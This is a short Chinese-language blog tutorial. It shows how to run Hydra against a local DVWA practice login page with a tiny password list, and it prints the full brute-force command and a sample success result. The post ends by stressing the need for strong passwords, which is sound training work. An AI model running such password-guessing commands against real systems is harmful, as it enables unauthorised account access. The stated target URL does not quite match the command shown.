iT邦幫忙

0

Day14 Hydra 爆破測試:弱密碼根本擋不住

day14 hydra 爆破測試
yjunhan 2025-10-07 17:28:59102 瀏覽

  • 分享至 

  • xImage
    •  

  • 什麼是Hydra
    Hydra是一個快速、強大的暴力破解工具,可以對多種協議嘗試帳號密碼組合,常見用途像是測試系統的弱密碼或驗證管理員有沒有設安全密碼。

  • 試試看用Hydra爆破DVWA的登入頁
    先輸入brew install hydra
    安裝成功後再測試hydra -h
    確認成功的畫面應該會看到hydra的使用說明
    https://ithelp.ithome.com.tw/upload/images/20251007/20169338g2iMhUq298.png

接著建立一個小字典檔,我新建一個檔案passlist.txt,內容是:
1234
password
admin
letmein
dvwa

開始進行爆破測試,假設DVWA在http://localhost:8080/login.php
可以在終端機輸入hydra -l admin -P passlist.txt 127.0.0.1 http-post-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Login failed"
如果清單裡的密碼正確,Hydra就會顯示:
[80][http-post-form] host: 127.0.0.1 login: admin password: dvwa

  • 心得
    原來只要用簡單的工具,弱密碼幾秒鐘就能被破解,安全意識比想像中重要,我們應該要使用強度較強的密碼,才不會輕易地被破解。

圖片
  熱門推薦
圖片
{{ item.channelVendor }} | {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言
iThome鐵人賽
iThome鐵人賽
參賽組數
902
團體組數
37
累計文章數
17545
完賽人數
213
iT+看影片追技術 看影片追技術 看更多
熱門tag 看更多
15th鐵人賽 16th鐵人賽 13th鐵人賽 14th鐵人賽 12th鐵人賽 17th鐵人賽 11th鐵人賽 鐵人賽 2019鐵人賽 javascript 2018鐵人賽 python 2017鐵人賽 windows php c# linux windows server css react
熱門問題
熱門回答
熱門文章
IT邦幫忙